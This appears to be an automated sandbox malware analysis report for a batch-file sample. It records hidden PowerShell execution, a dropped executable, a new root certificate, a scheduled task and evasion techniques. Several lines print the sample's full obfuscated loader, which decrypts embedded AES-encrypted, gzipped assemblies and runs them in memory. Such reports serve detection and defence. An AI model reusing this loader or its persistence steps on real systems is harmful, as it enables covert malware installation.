Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: NhoqAfkhHL.bat

Static file information: File size 7301955 > 1048576

Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000019.00000000.2239543415.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000019.00000000.2239543415.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ~1.PDB @ source: svchost.exe, 00000019.00000000.2239543415.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.3524269971.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.3523139455.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239439569.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000019.00000002.3526338299.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.2239622970.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Suspicious command line found

Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object System.IO.MemoryStream(,$juOOu);'.Replace('', ''); Invoke-Expression '$JwqOr=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$zXHyN=New-Object System.IO.Compression.GZipStream($FPPmA, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[System.Reflection.Assembly]::Load([byte[]]$juOOu);'.Replace('', ''); Invoke-Expression '$CmubR=$tPEQt.EntryPoint;'.Replace('', ''); Invoke-Expression '$CmubR.Invoke($null, $DoZwZ);'.Replace('', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$ETi = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$gpc = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object System.IO.MemoryStream(,$juOOu);'.Replace('', ''); Invoke-Expression '$JwqOr=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$zXHyN=New-Object System.IO.Compression.GZipStream($FPPmA, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[System.Reflection.Assembly]::Load([byte[]]$juOOu);'.Replace('', ''); Invoke-Expression '$CmubR=$tPEQt.EntryPoint;'.Replace('', ''); Invoke-Expression '$CmubR.Invoke($null, $DoZwZ);'.Replace('', '');}$TYRmI = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$ETi = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$gpc = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object System.IO.MemoryStream(,$juOOu);'.Replace('', ''); Invoke-Expression '$JwqOr=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$zXHyN=New-Object System.IO.Compression.GZipStream($FPPmA, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[System.Reflection.Assembly]::Load([byte[]]$juOOu);'.Replace('', ''); Invoke-Expression '$CmubR=$tPEQt.EntryPoint;'.Replace('', ''); Invoke-Expression '$CmubR.Invoke($null, $DoZwZ);'.Replace('', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$ETi = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$gpc = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object System.IO.MemoryStream(,$juOOu);'.Replace('', ''); Invoke-Expression '$JwqOr=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$zXHyN=New-Object System.IO.Compression.GZipStream($FPPmA, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[System.Reflection.Assembly]::Load([byte[]]$juOOu);'.Replace('', ''); Invoke-Expression '$CmubR=$tPEQt.EntryPoint;'.Replace('', ''); Invoke-Expression '$CmubR.Invoke($null, $DoZwZ);'.Replace('', '');}$TYRmI = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$ETi = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$gpc = QsuOu (PChco ([Convert]::FromBase64String($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior

Source: qVrKPA.exe.28.dr

Static PE information: 0xA8D14247 [Thu Oct 2 02:11:19 2059 UTC]

Source: C:\Windows\System32\winlogon.exe

Code function: 8_2_000001E858981E3C LoadLibraryA,GetProcAddress,SleepEx,

8_2_000001E858981E3C

Source: C:\Windows\System32\winlogon.exe	Code function: 8_3_000001E85896A7DD push rcx; retf 003Fh	8_3_000001E85896A7DE
Source: C:\Windows\System32\lsass.exe	Code function: 9_3_00000140ADFDA7DD push rcx; retf 003Fh	9_3_00000140ADFDA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 12_3_00000195DD5AA7DD push rcx; retf 003Fh	12_3_00000195DD5AA7DE
Source: C:\Windows\System32\cmd.exe	Code function: 13_3_00000192913CA7DD push rcx; retf 003Fh	13_3_00000192913CA7DE
Source: C:\Windows\System32\conhost.exe	Code function: 14_3_00000139F96BA7DD push rcx; retf 003Fh	14_3_00000139F96BA7DE
Source: C:\Windows\System32\dwm.exe	Code function: 15_3_000001160CD4A7DD push rcx; retf 003Fh	15_3_000001160CD4A7DE
Source: C:\Windows\System32\dwm.exe	Code function: 15_3_000001160CB7A7DD push rcx; retf 003Fh	15_3_000001160CB7A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 19_3_00000257E108A7DD push rcx; retf 003Fh	19_3_00000257E108A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 20_3_000001428DCEA7DD push rcx; retf 003Fh	20_3_000001428DCEA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 21_3_000001F28C1EA7DD push rcx; retf 003Fh	21_3_000001F28C1EA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 22_3_000001CA97FEA7DD push rcx; retf 003Fh	22_3_000001CA97FEA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 23_3_000001D2652FA7DD push rcx; retf 003Fh	23_3_000001D2652FA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 24_3_00000254A27DA7DD push rcx; retf 003Fh	24_3_00000254A27DA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 25_3_0000024B87DBA7DD push rcx; retf 003Fh	25_3_0000024B87DBA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 26_3_00000205FB3DA7DD push rcx; retf 003Fh	26_3_00000205FB3DA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 29_3_000001A20568A7DD push rcx; retf 003Fh	29_3_000001A20568A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 30_3_0000018EC1F4A7DD push rcx; retf 003Fh	30_3_0000018EC1F4A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 31_3_0000025CE3BDA7DD push rcx; retf 003Fh	31_3_0000025CE3BDA7DE

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\$nya-onimai2\qVrKPA.exe

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\$nya-onimai2\qVrKPA.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\System32\Tasks\$nya-gykiBRcP

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $nya-dll32

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
